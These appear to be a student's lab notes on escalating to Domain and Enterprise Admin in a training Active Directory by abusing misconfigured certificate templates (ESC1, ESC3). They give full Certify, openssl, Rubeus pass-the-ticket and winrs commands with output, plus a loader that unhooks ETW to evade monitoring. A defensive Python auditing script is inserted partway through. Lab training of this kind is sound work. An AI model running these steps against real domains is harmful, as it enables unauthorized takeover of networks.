  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'

[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'

    Enterprise CA Name            : moneycorp-MCORP-DC-CA
    DNS Hostname                  : mcorp-dc.moneycorp.local
    FullName                      : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
    Cert Thumbprint               : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
    Cert Serial                   : 48D51C5ED50124AF43DB7A448BF68C49
    Cert Start Date               : 11/26/2022 1:59:16 AM
    Cert End Date                 : 11/26/2032 2:09:15 AM
    Cert Chain                    : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
    [!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
      Allow  ManageCA, ManageCertificates               mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
    Enrollment Agent Restrictions : None
Enabled certificate templates where users can supply a SAN:
    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : WebServer
    Schema Version                        : 1
    Validity Period                       : 2 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : SubCA
    Schema Version                        : 1
    Validity Period                       : 5 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : <null>
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : HTTPSCertificates
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : dcorp\RDPUsers                S-1-5-21-719815819-3726368948-3917688648-1123
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
        WriteOwner Principals       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519



Certify completed in 00:00:15.7994434

C:\Users\student98>


The HTTPSCertificates template grants enrollment rights to the RDPUsers group, allows the requestor to supply the Subject Name, requires no authorized signatures, and carries the Client Authentication EKU.
Recall that student98 is a member of the RDPUsers group. This means that, as student98, we can request a certificate for any user (the ESC1 condition).

Let’s request a certificate for Domain Admin – Administrator:

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator

We copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it to esc1.pem.

We need to convert it to PFX to use it. Use the openssl binary on the student VM to do that. I will use SecretPass@123 as the export password.

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx

Use the PFX created above with Rubeus to request a TGT for the DA Administrator (of the dcorp domain) and inject it into the current session. The exact Rubeus command and its output are in the summary below.

summary:
c:\AD\Tools>C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : dcorp\student98
[*] No subject name specified, using current context as subject.

[*] Template                : HTTPSCertificates
[*] Subject                 : CN=student98, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName                 : administrator

[*] Certificate Authority   : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 40

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAplrRlQeBSoQfoyWgAjdW8rLpCfXwWJjOCEgn3vbYMpbDhMsX
<snip>
As8EU3Mb0J5mlgFr3tyycV3YEkNLdIZq6pWwvdV5LfrFFQBVx9bW
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGYTCCBUmgAwIBAgITFQAAACjVCkCBIhFPpQAAAAAAKDANBgkqhkiG9w0BAQsF
<snip>
F4Dpukv2R3Xz62HSo0iyY1WSEsle0cBIOBFqdcnQVgRj7F3XqvNIVM3fua9wDYw4
TBoGjag=
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:10.2982772

c:\AD\Tools>notepad C:\ad\Tools\esc1.pem

c:\AD\Tools>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt
[*] Action: Ask TGT

[*] Got domain: dollarcorp.moneycorp.local
[*] Using PKINIT with etype rc4_hmac and subject: CN=student98, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIG4jCCBt6gAwIBBaEDAgEWooIFxjCCBcJhggW+MIIFuqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
      <snip>
      ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWw=
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/dollarcorp.moneycorp.local
  ServiceRealm             :  DOLLARCORP.MONEYCORP.LOCAL
  UserName                 :  administrator (NT_PRINCIPAL)
  UserRealm                :  DOLLARCORP.MONEYCORP.LOCAL
  StartTime                :  11/27/2025 5:26:07 AM
  EndTime                  :  11/27/2025 3:26:07 PM
  RenewTill                :  12/4/2025 5:26:07 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  L1WkxZ3i0esXLN9gV/lm7A==
  ASREP (key)              :  E23E84B1C77442465881A781D384B555



c:\AD\Tools>klist

Current LogonId is 0:0x31e69f3e

Cached Tickets: (1)

#0>     Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/27/2025 5:26:07 (local)
        End Time:   11/27/2025 15:26:07 (local)
        Renew Time: 12/4/2025 5:26:07 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

c:\AD\Tools>winrs -r:dcorp-dc cmd /c set computername
COMPUTERNAME=DCORP-DC


c:\AD\Tools>winrs -r:dcorp-dc cmd /c set username
USERNAME=Administrator


c:\AD\Tools>



——
Next task

Awesome! We can use a similar method to escalate to Enterprise Admin privileges. Request a certificate for the Enterprise Administrator – Administrator (note the altname now carries the moneycorp.local domain):

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator

Save the certificate to esc1-EA.pem and convert it to PFX. I will use SecretPass@123 as the export password:

notepad C:\AD\Tools\esc1-EA.pem


C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-EA.pfx

Use Rubeus to request a TGT for the Enterprise Administrator – Administrator (this time using the esc1-EA.pfx created above):

Rubeus.exe asktgt /user:administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass@123 /ptt

Finally, access mcorp-dc:

winrs -r:mcorp-dc cmd /c set computername

We have EA privileges!

summary:
C:\Users\student98>cd c:\ad\Tools\1

c:\AD\Tools\1>klist purge

Current LogonId is 0:0x32e4f330
        Deleting all tickets:
        Ticket(s) purged!

c:\AD\Tools\1>C:\AD\Tools\Loader.exe -path C:\AD\Tools\1\Rubeus.exe -args asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass@123 /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\1\Rubeus.exe Arguments : asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass@123 /ptt
[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=student98, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'moneycorp.local\Administrator'
[*] Using domain controller: 172.16.1.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      <snip>
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/moneycorp.local
  ServiceRealm             :  MONEYCORP.LOCAL
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  MONEYCORP.LOCAL
  StartTime                :  11/28/2025 5:07:48 AM
  EndTime                  :  11/28/2025 3:07:48 PM
  RenewTill                :  12/5/2025 5:07:48 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  v2bJ91CiAXmDRIhj42rY1Q==
  ASREP (key)              :  3408A867E1594643CA6B3317F40F7CB1



c:\AD\Tools\1>klist

Current LogonId is 0:0x32e4f330

Cached Tickets: (1)

#0>     Client: Administrator @ MONEYCORP.LOCAL
        Server: krbtgt/moneycorp.local @ MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/28/2025 5:07:48 (local)
        End Time:   11/28/2025 15:07:48 (local)
        Renew Time: 12/5/2025 5:07:48 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

c:\AD\Tools\1>winrs -r:mcorp-dc cmd /c set computername
COMPUTERNAME=MCORP-DC


c:\AD\Tools\1>winrs -r:mcorp-dc cmd /c set username
USERNAME=Administrator


c:\AD\Tools\1>


Extra note:

Lab 21.1 solved (the error was KDC_ERR_PADATA_TYPE_NOSUPP) by unzipping Rubeus.exe from tools.zip and putting esc1-EA.pem and esc1-EA.pfx there too (in c:\ad\tools\1).


next

2 – Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin

If we list vulnerable templates in moneycorp, we get the following result:

C:\AD\Tools\Certify.exe find /vulnerable
c:\AD\Tools>C:\AD\Tools\Certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'

[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'

    Enterprise CA Name            : moneycorp-MCORP-DC-CA
    DNS Hostname                  : mcorp-dc.moneycorp.local
    FullName                      : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
    Cert Thumbprint               : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
    Cert Serial                   : 48D51C5ED50124AF43DB7A448BF68C49
    Cert Start Date               : 11/26/2022 1:59:16 AM
    Cert End Date                 : 11/26/2032 2:09:15 AM
    Cert Chain                    : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
    [!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
      Allow  ManageCA, ManageCertificates               mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : SmartCardEnrollment-Agent
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Certificate Request Agent
    mspki-certificate-application-policy  : Certificate Request Agent
    Permissions
      Enrollment Permissions
        Enrollment Rights           : dcorp\Domain Users            S-1-5-21-719815819-3726368948-3917688648-513
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
        WriteOwner Principals       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519



Certify completed in 00:00:16.2420492

c:\AD\Tools>


The "SmartCardEnrollment-Agent" template has an EKU of "Certificate Request Agent" and grants enrollment rights to Domain Users. If we can find another template that has an EKU allowing domain authentication and an application policy requirement of Certificate Request Agent (one authorized signature required), we can use an enrollment agent certificate to request a certificate on behalf of any user (the ESC3 condition).
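
The ESC1 condition noted for HTTPSCertificates earlier and the ESC3 condition just described can both be checked mechanically from the Certify find output, which is what a defender auditing AD CS would want. The script below is an added example, not part of the lab notes and not a Certify feature: it parses the text layout Certify prints (as shown on this page) and flags templates meeting either condition, plus the CA-level EDITF_ATTRIBUTESUBJECTALTNAME2 flag; the privileged-group list and the sample excerpt are constructed assumptions.

```python
"""Audit Certify 'find' output for the ESC1 / ESC3 / ESC6 conditions.
Added example, not code from the lab notes or from Certify; it parses the text
layout Certify prints (as shown above) and applies the conditions the notes describe."""
import re
from dataclasses import dataclass, field

# Assumption: Enroll held by these principals is expected; anyone else is "low privileged".
PRIVILEGED_SUFFIXES = ("Domain Admins", "Enterprise Admins", "Administrator", "Administrators")
# EKUs that let a certificate be used for domain (PKINIT) authentication.
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "PKINIT Client Authentication", "Any Purpose"}
FIELD_RE = re.compile(r"^\s+(\S.*?)\s*:\s*(.*)$")   # "    Key   : value"
SID_RE = re.compile(r"\s+S-1-5-\S+$")               # trailing SID column


@dataclass
class Template:
    name: str = ""
    name_flags: set = field(default_factory=set)
    sigs_required: int = 0
    ekus: set = field(default_factory=set)          # EKU + application policy
    enrollers: list = field(default_factory=list)   # principals with Enroll


def _split_list(value: str) -> set:
    # 'A, B, C' -> {'A', 'B', 'C'}; '<null>', 'NONE' and '' mean no values
    return set() if value.strip() in ("", "<null>", "NONE") else {v.strip() for v in value.split(",")}


def parse_certify(text: str):
    """Return (ca_allows_san, [Template, ...]) parsed from Certify find output."""
    ca_allows_san = "EDITF_ATTRIBUTESUBJECTALTNAME2 set" in text
    templates, cur, in_enroll = [], None, False
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m and m.group(1) == "CA Name":            # every template block starts here
            cur, in_enroll = Template(), False
            templates.append(cur)
        elif cur is None:
            continue
        elif m:
            key, val = m.group(1), m.group(2)
            in_enroll = key == "Enrollment Rights"
            if key == "Template Name":
                cur.name = val.strip()
            elif key == "msPKI-Certificate-Name-Flag":
                cur.name_flags = _split_list(val)
            elif key == "Authorized Signatures Required":
                cur.sigs_required = int(val)
            elif key in ("pkiextendedkeyusage", "mspki-certificate-application-policy"):
                cur.ekus |= _split_list(val)
            elif in_enroll:
                cur.enrollers.append(SID_RE.sub("", val).strip())
        elif in_enroll and SID_RE.search(line):      # continuation rows of the Enroll list
            cur.enrollers.append(SID_RE.sub("", line).strip())
    return ca_allows_san, templates


def audit(text: str) -> dict:
    """Map template name -> findings; the CA-level ESC6 finding is stored under 'CA'."""
    ca_san, templates = parse_certify(text)
    findings = {}
    if ca_san:
        findings["CA"] = ["ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 lets any enrollee add a SAN"]
    for t in templates:
        low = [p for p in t.enrollers if not p.endswith(PRIVILEGED_SUFFIXES)]
        out = []
        auth_capable = not t.ekus or bool(t.ekus & AUTH_EKUS)   # no EKU at all also allows auth
        if low and "ENROLLEE_SUPPLIES_SUBJECT" in t.name_flags and t.sigs_required == 0 and auth_capable:
            out.append(f"ESC1: enrollee supplies subject, auth EKU, enrollable by {', '.join(low)}")
        if low and "Certificate Request Agent" in t.ekus:
            out.append(f"ESC3: Certificate Request Agent EKU enrollable by {', '.join(low)}")
        if out:
            findings[t.name] = out
    return findings


# Constructed excerpt in the layout Certify printed above (not a real capture).
SAMPLE = r"""
    [!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : WebServer
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Server Authentication
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : HTTPSCertificates
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
        Enrollment Rights           : dcorp\RDPUsers                S-1-5-21-719815819-3726368948-3917688648-1123
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : SmartCardEnrollment-Agent
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Certificate Request Agent
        Enrollment Rights           : dcorp\Domain Users            S-1-5-21-719815819-3726368948-3917688648-513
"""
```

On the sample, WebServer is not reported (only admins can enroll), HTTPSCertificates is reported as ESC1, SmartCardEnrollment-Agent as ESC3, and the CA as ESC6; each finding names the non-admin principal whose Enroll right (or the template flag) a remediation should remove.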

Now, request an Enrollment Agent Certificate from the template "SmartCardEnrollment-Agent":

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent

Like earlier, save the certificate text to esc3.pem and convert it to PFX (this one is the agent certificate, esc3-agent.pfx). Let's keep using SecretPass@123 as the export password:

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-agent.pfx

Now we can use the Enrollment Agent Certificate to request a certificate for DA from the template SmartCardEnrollment-Users:

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123

Once again, save the certificate text to esc3-da1.pem and convert the pem to pfx. Still using SecretPass@123 as the export password:

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-da1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-DA.pfx

Use the esc3-DA.pfx created above with Rubeus to request a TGT for DA:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc3-DA.pfx /password:SecretPass@123 /ptt

Check if we actually have DA privileges now:

winrs -r:dcorp-dc cmd /c set username

summary:

So first, start with:
C:\Users\student98>cd c:\ad\Tools\3

c:\AD\Tools\3>C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : dcorp\student98
[*] No subject name specified, using current context as subject.

[*] Template                : SmartCardEnrollment-Agent
[*] Subject                 : CN=student98, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local

[*] Certificate Authority   : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 49

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA4AoR+dGTeLl+jSNzMBNcodh7FyLzNrvNyoFF6SzrZaYRybsG
<snip>
R+j88zO7FSReSrorxm6e777u/n61Qqqiew98lNq0JsB9ZFIcbeWVRe8=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGXDCCBUSgAwIBAgITFQAAADEEGtjgiX1M4AAAAAAAMTANBgkqhkiG9w0BAQsF
<snip>
bSeKIknTb13Z0c7HUC6uKSKllhYEBZcYQ9VcLtyXKNja06F+Lsm83hpLrGvFoSEW
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:11.2583102

c:\AD\Tools\3>

And then:

c:\AD\Tools\3>C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : dcorp\student98

[*] Template                : SmartCardEnrollment-Users
[*] On Behalf Of            : dcorp\administrator

[*] Certificate Authority   : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 47

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAv9n4v0nnl65CldgzIcq0M4hupDsXE4Uip0qz7THoWkq9qCrF
<snip>
siYaTcIDBR/I1DtgsB1al7uULtYgk4dSrfl5rpM+Eb0m35Awppy3PvEOmIPxsPdI
ot4FFUZuMBkmXcbFQW7Yx7Rye5t4lKr4hkpCyOKxosne3Bh2kyAP5ws=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGiTCCBXGgAwIBAgITFQAAAC9mGeTq4vSc3QAAAAAALzANBgkqhkiG9w0BAQsF
<snip>
RlMMc+WnM1eWToVIjAOixqSk6nIwbBjC80Lq6ZZ15qAqvsSP0zBcdjrgw7ZF
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:10.4191618

c:\AD\Tools\3>C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\3\esc3-da1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\3\esc3-da1.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:
unable to write 'random state'

c:\AD\Tools\3>dir
 Volume in drive C has no label.
